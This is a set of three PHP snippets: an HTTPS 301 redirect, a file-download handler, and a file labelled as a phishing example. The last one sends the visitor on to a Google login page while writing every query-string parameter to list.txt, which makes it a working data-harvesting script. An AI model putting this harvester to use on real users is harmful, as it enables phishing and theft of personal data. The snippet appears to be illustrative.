Lang: PHP

PHP.301Redirect.php

<?php
	if(!isset($_SERVER['HTTPS']) || $_SERVER['HTTPS'] == "" || $_SERVER['HTTPS'] == "off"){
		$redirect = "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
		header('Status: 301 Moved Permanently', true);
		header("Location: $redirect", true, 301);
	}
?>

PHP.OctetStream.php

<?php

	$file = './path/to/file';
	if (file_exists($file)) {
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename='.basename($file));
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate');
		header('Pragma: public');
		header('Content-Length: ' . filesize($file));
		ob_clean();
		flush();
		readfile($file);
		exit();
	}
	else {
		exit('Failed...');
	}

?>

PHP.PhishingExample.php

<?php

  // THIS EXAMPLE SHOWS HOW A PHISHER WOULD CAPTURE QUERY STRING DATA
	Header("Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2");

	$handle = fopen("list.txt", "a");
	
	Foreach($_GET as $variable => $value) {
		fwrite($handle, $variable);
		fwrite($handle, "=");
		fwrite($handle, $value);
		fwrite($handle, "\r\n");
	}

	Fwrite($handle, "\r\n");
	fclose($handle);
	exit;

?>